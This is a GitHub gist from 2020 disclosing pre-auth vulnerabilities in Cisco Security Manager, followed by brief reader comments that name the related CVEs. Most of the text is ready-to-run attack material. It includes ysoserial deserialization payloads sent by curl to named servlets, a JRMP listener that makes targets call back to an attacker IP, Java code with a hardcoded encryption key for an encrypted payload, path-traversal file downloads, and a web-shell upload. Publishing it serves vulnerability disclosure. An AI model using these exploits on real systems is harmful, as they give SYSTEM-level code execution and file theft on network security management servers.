Skip to content

Instantly share code, notes, and snippets.

@Frycos
Created November 16, 2020 18:55
Show Gist options
  • Save Frycos/8bf5c125d720b3504b4f28a1126e509e to your computer and use it in GitHub Desktop.
Save Frycos/8bf5c125d720b3504b4f28a1126e509e to your computer and use it in GitHub Desktop.

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

Requirement: Download commons-beanutils-1.6.1.jar from central maven repository.

Remote Code Execution SecretService.jsp :-)

java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils

curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp

Remote Code Execution CsJaasServiceServlet

Compile JaasEncryptor.java and replace the b64Payload content:

import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {

	public static void main(String args[]) {
		String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

		byte[] payload = Base64.getDecoder().decode(b64Payload);
		byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
		
		byte[] enc = BlobCrypt.encryptArray(payload, key);
		System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
		byte[] dec = BlobCrypt.decryptArray(enc, key);
	}
}

Prepare JRMP Listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0

Compile encrypted payload:

javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor

Send payload to Servlet with parameters cmd=data + new line + data=[ENCRYPTED_PAYLOAD].

Remote Code Execution AuthTokenServlet

Prepare JRMP Listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2

Send request:

curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet

Remote Code Execution ClientServicesServlet

Prepare JRMP listener:

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3

Send request:

curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet

Remote Code Execution CTMServlet

java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2

curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'

Arbitrary File Download XdmConfigRequestHandler

GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]

Arbitrary File Download XdmResourceRequestHandler

GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta

Arbitrary File Upload XmpFileUploadServlet

Write a web shell e.g.

POST /cwhp/XmpFileUploadServlet?maxFileSize=100

Normal multi-part e.g. writing web shell in filename with ../../MDC/tomcat/webapps/cwhp/testme.jsp.

Arbitrary File Download XmpFileDownloadServlet

GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1

This will respond with a ZIP file containing all files from the directory.

Arbitrary File Download SampleFileDownloadServlet

GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]

This will respond with a ZIP file containing all files from the directory.

Arbitrary File Download resultsFrame.jsp

GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]

Remote Code Execution SecretServiceServlet

See also https://de.tenable.com/security/research/tra-2017-23

java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2

curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet

@stefan-it
Copy link

What Cisco Enterprise product should I use to prevent these kind of security holes 🤔

@ruppde
Copy link

ruppde commented Nov 17, 2020

hmm, I don't see info on this advisory published by cisco in the same batch:
CSCvu99938
Cisco Security Manager Static Credential Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-csm-rce-8gjUz9fW

static credentials are a cisco classic, I wonder why it's only CVSS 7.4 ?

@ltchachee
Copy link

What Cisco Enterprise product should I use to prevent these kind of security holes 🤔

Cisco has been known to have a lot of security issues they sketch address or report. Quite a few default cred issues as well. As all things security, it's not about a single device, but defense-in-depth and good monitoring.

@cfi-gb
Copy link

cfi-gb commented Nov 19, 2020

For the records, the related CVEs should be:

CVE-2020-27130 (Arbitrary File Download Vulns)
CVE-2020-27131 (RCE / Java deserialization Vulns)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment